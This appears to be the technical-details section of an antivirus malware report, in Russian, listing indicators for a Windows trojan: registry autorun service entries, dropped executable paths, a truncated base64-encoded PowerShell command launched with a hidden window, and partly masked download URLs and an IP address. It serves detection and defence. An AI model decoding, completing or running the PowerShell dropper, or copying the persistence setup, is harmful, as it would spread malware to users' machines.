Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\vfwwdm32] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\vfwwdm32] 'ImagePath' = '"%WINDIR%\SysWOW64\rasgcw\vfwwdm32.exe"'
- 'vfwwdm32' "%WINDIR%\SysWOW64\rasgcw\vfwwdm32.exe"
- 'vfwwdm32' %WINDIR%\SysWOW64\rasgcw\vfwwdm32.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFADMANwB6AGcAagBlAD0AKAAnAFQAJwArACcAMgA0ACcAKwAnADkAagB1AHgAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAFYAOgB0AEUAbQBQAFwAbwBGAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...
- %TEMP%\office2019\wl0ra8ue0.exe
- %WINDIR%\syswow64\rasgcw\vfwwdm32.exe
- %TEMP%\office2019\wl0ra8ue0.exe в %WINDIR%\syswow64\rasgcw\vfwwdm32.exe
- '13#.#19.36.33':80
- http://av####oolvsa.zt.ua/bin/N/
- http://13#.#19.36.33/GgULHhysE3FAi/6wPX73Skc/
- DNS ASK av####oolvsa.zt.ua
- '%TEMP%\office2019\wl0ra8ue0.exe'
- '%WINDIR%\syswow64\rasgcw\vfwwdm32.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFADMANwB6AGcAagBlAD0AKAAnAFQAJwArACcAMgA0ACcAKwAnADkAagB1AHgAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAFYAOgB0AEUAbQBQAFwAbwBGAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)